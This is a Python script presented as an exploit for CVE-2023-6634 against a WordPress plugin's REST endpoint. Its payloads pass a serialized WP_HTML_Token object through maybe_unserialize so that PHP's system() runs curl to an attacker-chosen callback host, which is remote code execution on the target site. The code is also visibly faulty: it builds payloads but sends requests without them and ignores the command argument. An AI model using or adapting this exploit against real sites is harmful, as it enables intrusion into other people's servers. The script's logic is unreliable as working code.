import sys
import requests
from urllib.parse import quote

def construct_final_url(interactsh_url, padstr):
    # This function would typically construct the final URL using the interactsh_url and padstr.
    # For simplicity, we'll just concatenate them, but you might need more complex logic here.
    return f"{interactsh_url}{padstr}"

def exploit(target_url, interactsh_url, command):
    padstr = "random_string"  # Or generate a random string
    finalurl = construct_final_url(interactsh_url, padstr)

    # Encode the command for URL inclusion
    encoded_command = quote(command)

    payloads = [
        f'GET /wp-json/lp/v1/load_content_via_ajax/?callback={{"class"%3a"LP_Debug","method"%3a"var_dump"}}&args="{padstr}" HTTP/1.1',
        f'GET /wp-json/lp/v1/load_content_via_ajax/?callback={{"class"%3a"LP_Helper","method"%3a"maybe_unserialize"}}&args="O%3a13%3a\u0022WP_HTML_Token\u0022%3a2%3a{{s%3a13%3a\u0022bookmark_name\u0022%3bs%3a64%3a\u0022curl+{finalurl}\u0022%3bs%3a10%3a\u0022on_destroy\u0022%3bs%3a6%3a\u0022system\u0022%3b}}" HTTP/1.1',
        # Add more payloads as needed
    ]

    headers = {
        'Host': target_url.replace('http://', '').replace('https://', ''),
        'Connection': 'close'
    }

    for payload in payloads:
        # Construct the full URL for the request
        request_url = f"{target_url}/wp-json/lp/v1/load_content_via_ajax/"
        
        # Send the request
        try:
            response = requests.get(request_url, headers=headers, timeout=10)
            print(f"Payload sent. Response:\n{response.text}")
        except Exception as e:
            print(f"Error sending payload: {e}")

if __name__ == "__main__":
    if len(sys.argv) != 4:
        print("Usage: python CVE-2023-6634.py <target_url> <interactsh_url> <command>")
        sys.exit(1)
    
    target_url, interactsh_url, command = sys.argv[1], sys.argv[2], sys.argv[3]
    exploit(target_url, interactsh_url, command)